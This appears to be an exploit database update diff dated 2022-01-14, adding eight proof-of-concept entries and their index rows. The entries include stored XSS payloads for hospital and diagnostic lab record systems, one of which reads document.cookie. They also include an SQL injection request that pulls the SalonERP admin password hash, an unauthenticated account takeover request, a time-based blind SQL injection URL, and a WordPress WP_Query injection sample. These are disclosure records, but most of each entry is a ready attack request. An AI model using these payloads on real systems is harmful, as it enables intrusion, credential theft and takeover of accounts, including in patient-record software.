DB: 2022-01-14

8 changes to exploits/shellcodes

Hospitals Patient Records Management System 1.0 - 'room_types' Stored Cross Site Scripting (XSS)
Hospitals Patient Records Management System 1.0 - 'room_list' Stored Cross Site Scripting (XSS)
Hospitals Patient Records Management System 1.0 - 'doctors' Stored Cross Site Scripting (XSS)
SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated)
Online Diagnostic Lab Management System 1.0 - Account Takeover (Unauthenticated)
Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS)
Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated)
WordPress Core 5.8.2 - 'WP_Query' SQL Injection

exploits/php/webapps/50656.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Hospitals Patient Records Management System 1.0 - 'room_types' Stored Cross Site Scripting (XSS)
+# Exploit Author: (Sant268)
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
+# Version: HPRMS 1.0
+# Tested on: Ubuntu 20, Apache
+
+- Description:
+A XSS issue in HPRMS v.1.0 allows remote attackers to inject JavaScript via /articles in the description parameter.
+
+- Payload used:
+<img src =q onerror=prompt(8)>
+
+- Steps to reproduce:
+1- Go to http://victim.com/admin/?page=room_types
+2- Add Room type, paste the payload in description
+3- Alert will pop whenever the page is accessed.

exploits/php/webapps/50657.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Hospitals Patient Records Management System 1.0 - 'room_list' Stored Cross Site Scripting (XSS)
+# Exploit Author: (Sant268)
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
+# Version: HPRMS 1.0
+# Tested on: Ubuntu 20, Apache
+
+- Description:
+A XSS issue in HPRMS v.1.0 allows remote attackers to inject JavaScript via /articles in the description parameter.
+
+- Payload used:
+<img src =q onerror=prompt(8)>
+
+- Steps to reproduce:
+1- Go to http://victim.com/admin/?page=room_list
+2- Add Room type, paste the payload in description
+3- Alert will pop whenever the page is accessed.

exploits/php/webapps/50658.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Hospitals Patient Records Management System 1.0 - 'doctors' Stored Cross Site Scripting (XSS)
+# Exploit Author: (Sant268)
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
+# Version: HPRMS 1.0
+# Tested on: Ubuntu 20, Apache
+
+- Description:
+A Stored XSS issue in HPRMS v.1.0 allows remote attackers to inject JavaScript via /articles in the description parameter.
+
+- Payload used:
+<img src =q onerror=prompt(8)>
+
+- Steps to reproduce:
+1- Go to http://victim.com/admin/?page=doctors
+2- Add a Doctor, paste the payload in specialization
+3- Alert will pop whenever the page is accessed.

exploits/php/webapps/50659.txt

@@ -0,0 +1,45 @@
+# Exploit Title: SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated)
+# Exploit Author: Betul Denizler
+# Vendor Homepage: https://salonerp.sourceforge.io/
+# Software Link: https://sourceforge.net/projects/salonerp/files/latest/download
+# Version: SalonERP v3.0.1
+# Tested on: Ubuntu Mate 20.04
+# Vulnerable Parameter: sql
+# Date: 11/01/2022
+'''
+DESCRIPTION
+========
+The vulnerability allows an attacker to inject payload using 'sql' parameter in sql query while generating report. Upon successful discovering the login admin password hash, it can be decrypted and obtained the plain-text password.
+
+
+POC REQUEST:
+========
+POST /salonerp/report.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 755
+Origin: http://127.0.0.1
+Connection: close
+Cookie: salonerp-id=vDF9uCpfqQAXuNhsCWvH; PHPSESSID=e170a8c9dfeef78751cb49b9977b2373
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+save=&title=bestCustomers&font=Times&fontSize=12&sql=SELECT%0A%09%09%09%09%09%09(select+concat(u.name%2C'+'%2Cu.password)+from+Models%5CUser+u+where+u.id+%3D+1)+AS+userpass%2C%0A%09%09%09%09%09%09COUNT(i.id)+AS+amount%2C%0A%09%09%09%09%09%09SUM(i.cash+%2B+i.bank)+as+revenue%0A%09%09%09%09%09FROM+Models%5CInvoice+i%0A%09%09%09%09%09JOIN+i.event+e%0A%09%09%09%09%09JOIN+e.customer+c%0A%09%09%09%09%09WHERE+DATE_DIFF(i.date%2C+%3AstartDate)+%3E%3D+0%0A%09%09%09%09%09AND+DATE_DIFF(i.date%2C+%3AendDate)+%3C%3D+0%0A%09%09%09%09%09GROUP+BY+e.customer%0A%09%09%09%09%09ORDER+BY+revenue+DESC&ask%5B0%5D%5Bname%5D=startDate&ask%5B0%5D%5Bvalue%5D=2021-12-14T00%3A00%3A00&ask%5B1%5D%5Bname%5D=endDate&ask%5B1%5D%5Bvalue%5D=2021-12-15T00%3A00%3A00&currency%5B%5D=2
+
+EXPLOITATION
+========
+1. Create a database and login panel
+2. Create employees in the settings
+3. Create Products, Customers and Events
+4. Pay for Products on Event
+5. Create report on the "Reports" menu
+6. Inject payload to the "sql" parameter in POST request for generate report
+
+Payload: (select+concat(u.name,'+',u.password)+from+Models\User+u+where+u.id+=+1)+AS+userpass
+'''

exploits/php/webapps/50660.txt

@@ -0,0 +1,86 @@
+#Exploit Title: Online Diagnostic Lab Management System 1.0 - Account Takeover (Unauthenticated)
+#Date: 11/01/2022
+#Exploit Author: Himash
+#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip
+#Version: 1.0
+#Tested on: Kali Linux
+
+
+Online Diagnostic Lab Management System 1.0 is vulnerable to unauthenticated account takeover.
+An attacker can takeover any registered 'Staff' user account by just sending below POST request
+By changing the the "id", "email", "password" and "cpass" parameters.
+
+#Steps to Reproduce
+
+1. Send the below POST request by changing "id", "email", "password" and "cpass" parameters.
+
+2. Log in to the user account by changed email and password.
+
+POST /odlms/classes/Users.php?f=save_client HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------218422725412817326673495861673
+Content-Length: 1551
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/odlms/?page=user
+Cookie: PHPSESSID=b17cc4d8837f564fc77d7b3e49b00d1e
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------218422725412817326673495861673
+Content-Disposition: form-data; name="id"
+
+2
+-----------------------------218422725412817326673495861673
+Content-Disposition: form-data; name="firstname"
+
+Claire
+-----------------------------218422725412817326673495861673
+Content-Disposition: form-data; name="middlename"
+
+C
+-----------------------------218422725412817326673495861673
+Content-Disposition: form-data; name="lastname"
+
+Blake
+-----------------------------218422725412817326673495861673
+Content-Disposition: form-data; name="gender"
+
+Female
+-----------------------------218422725412817326673495861673
+Content-Disposition: form-data; name="dob"
+
+1997-10-14
+-----------------------------218422725412817326673495861673
+Content-Disposition: form-data; name="contact"
+
+09456789123
+-----------------------------218422725412817326673495861673
+Content-Disposition: form-data; name="address"
+
+Sample Address only
+-----------------------------218422725412817326673495861673
+Content-Disposition: form-data; name="email"
+
+test@test.com
+-----------------------------218422725412817326673495861673
+Content-Disposition: form-data; name="password"
+
+Test@1234
+-----------------------------218422725412817326673495861673
+Content-Disposition: form-data; name="cpass"
+
+Test@1234
+-----------------------------218422725412817326673495861673
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------218422725412817326673495861673--

exploits/php/webapps/50661.txt

@@ -0,0 +1,23 @@
+#Exploit Title: Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS)
+#Date: 11/01/2022
+#Exploit Author: Himash
+#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip
+#Version: 1.0
+#Tested on: Kali Linux
+
+Online Diagnostic Lab Management System 1.0 is vulnerable to stored cross-site-scripting.
+Stored cross-site scripting (persistent XSS) arises when an application receives its data from
+an untrusted source and includes that data within its responses in an unsafe way.
+
+#Steps to Reproduce
+
+1. Login to the admin account with username 'admin' and password 'admin123'
+
+2. Navigate to the 'User List' option
+
+3. Create new user by adding following payload in
+   First Name and Last Name fields.
+   <image src/onerror=prompt(document.cookie)>
+
+4. XSS payload will be triggered in the page http://localhost/odlms/admin/?page=user/list

exploits/php/webapps/50662.txt

@@ -0,0 +1,23 @@
+#Exploit Title: Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated)
+#Date: 11/01/2022
+#Exploit Author: Himash
+#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip
+#Version: 1.0
+#Tested on: Kali Linux 2021.4, PHP 7.2.34
+
+#SQL Injection
+SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
+Online Diagnostic Lab Management System 1.0 is vulnerable to the SQL Injection in 'id' parameter of the 'appointment list' page.
+
+#Steps to reproduce
+
+Following URL is vulnerable to SQL Injection in the 'id' field.
+
+http://localhost/odlms/?page=appointments/view_appointment&id=1%27%20AND%20(SELECT%208053%20FROM%20(SELECT(SLEEP(7)))dJOC)%20AND%20%27test%27=%27test
+
+Server accepts the payload and the response get delayed by 7 seconds.
+
+#Impact
+
+An attcker can compromise the database of the application by manual method or by automated tools such as SQLmap.

exploits/php/webapps/50663.txt

@@ -0,0 +1,38 @@
+# Exploit Title: WordPress Core 5.8.2 - 'WP_Query' SQL Injection
+# Date: 11/01/2022
+# Exploit Author: Aryan Chehreghani
+# Vendor Homepage: https://wordpress.org
+# Software Link: https://wordpress.org/download/releases
+# Version: < 5.8.3
+# Tested on: Windows 10
+# CVE : CVE-2022-21661
+
+# [ VULNERABILITY DETAILS ] :
+
+#This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core,
+#Authentication is not required to exploit this vulnerability, The specific flaw exists within the WP_Query class,
+#The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries,
+#An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.
+
+# [ References ] :
+
+https://wordpress.org/news/category/releases
+https://www.zerodayinitiative.com/advisories/ZDI-22-020
+https://hackerone.com/reports/1378209
+
+# [ Sample Request ] :
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: localhost
+Upgrade-Insecure_Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: cross-site
+Sec-Fetch-User: ?1
+Cache-Control: max-age=0
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}

files_exploits.csv

@@ -44735,3 +44735,11 @@ id,file,description,date,author,type,platform,port
 50649,exploits/php/webapps/50649.txt,"Online Railway Reservation System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Zachary Asher",webapps,php,
 50651,exploits/php/webapps/50651.txt,"Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Dominic Clark",webapps,php,
 50655,exploits/php/webapps/50655.txt,"WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Veshraj Ghimire",webapps,php,
+50656,exploits/php/webapps/50656.txt,"Hospitals Patient Records Management System 1.0 - 'room_types' Stored Cross Site Scripting (XSS)",1970-01-01,Sant268,webapps,php,
+50657,exploits/php/webapps/50657.txt,"Hospitals Patient Records Management System 1.0 - 'room_list' Stored Cross Site Scripting (XSS)",1970-01-01,Sant268,webapps,php,
+50658,exploits/php/webapps/50658.txt,"Hospitals Patient Records Management System 1.0 - 'doctors' Stored Cross Site Scripting (XSS)",1970-01-01,Sant268,webapps,php,
+50659,exploits/php/webapps/50659.txt,"SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated)",1970-01-01,"Betul Denizler",webapps,php,
+50660,exploits/php/webapps/50660.txt,"Online Diagnostic Lab Management System 1.0 - Account Takeover (Unauthenticated)",1970-01-01,Himash,webapps,php,
+50661,exploits/php/webapps/50661.txt,"Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS)",1970-01-01,Himash,webapps,php,
+50662,exploits/php/webapps/50662.txt,"Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated)",1970-01-01,Himash,webapps,php,
+50663,exploits/php/webapps/50663.txt,"WordPress Core 5.8.2 - 'WP_Query' SQL Injection",1970-01-01,"Aryan Chehreghani",webapps,php,